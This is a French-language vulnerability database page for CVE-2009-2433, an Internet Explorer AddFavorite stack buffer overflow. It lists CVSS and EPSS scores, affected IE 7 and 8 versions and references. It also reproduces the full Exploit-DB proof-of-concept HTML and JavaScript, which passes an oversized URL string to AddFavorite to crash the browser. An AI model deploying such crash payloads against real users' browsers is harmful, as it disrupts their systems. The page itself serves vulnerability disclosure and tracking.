CVE-2009-2433 : Détail

CVE-2009-2433

Overflow
1.93%V3
Network
2009-07-10
18h25 +00:00
2017-09-18
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Stack-based buffer overflow in the AddFavorite method in Microsoft Internet Explorer allows remote attackers to cause a denial of service (application crash) and possibly have unspecified other impact via a long URL in the first argument.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 9100

Date de publication : 2009-07-08 22h00 +00:00
Auteur : Sberry
EDB Vérifié : Yes

-------------------------------------------> IE Add Favourites Stack Buffer Overflow POC Sberry, Compaq -------------------------------------------> <html> <head> <script language="JavaScript" type="Text/Javascript"> function go() { var str =unescape('%u4141'); var finalstr = createInlineBuffer(str, 5150000); var len = finalstr.length; document.write(len); addfav(finalstr); } /* Effient in-line creation */ function createInlineBuffer (str, num) { var i = Math.ceil(Math.log(num) / Math.LN2), res = str; do { res += res; } while (0 < --i); return res.slice(0, str.length * num); } /* Vulnerable Function */ function addfav(str) { if (document.all) { window.external.AddFavorite ('http://'+str,'Crash') } } </script> </head> <body> <a href="javascript:go()">Add To Favorites</a> </body> </html> # milw0rm.com [2009-07-09]

Products Mentioned

Configuraton 0

Microsoft>>Ie >> Version 8.0b

    Microsoft>>Internet_explorer >> Version 7

    Microsoft>>Internet_explorer >> Version 7.0

    Microsoft>>Internet_explorer >> Version 7.0

    Microsoft>>Internet_explorer >> Version 7.0

    Microsoft>>Internet_explorer >> Version 7.0

    Microsoft>>Internet_explorer >> Version 7.0

    Microsoft>>Internet_explorer >> Version 7.0.5730

    Microsoft>>Internet_explorer >> Version 7.0.5730.11

    Microsoft>>Internet_explorer >> Version 7.00.5730.1100

    Microsoft>>Internet_explorer >> Version 7.00.6000.16386

    Microsoft>>Internet_explorer >> Version 7.00.6000.16441

    Microsoft>>Internet_explorer >> Version 8.0.6001

    Microsoft>>Internet_explorer >> Version 8.0.6001

    Références

    http://www.exploit-db.com/exploits/9100
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.securityfocus.com/bid/35620
    Tags : vdb-entry, x_refsource_BID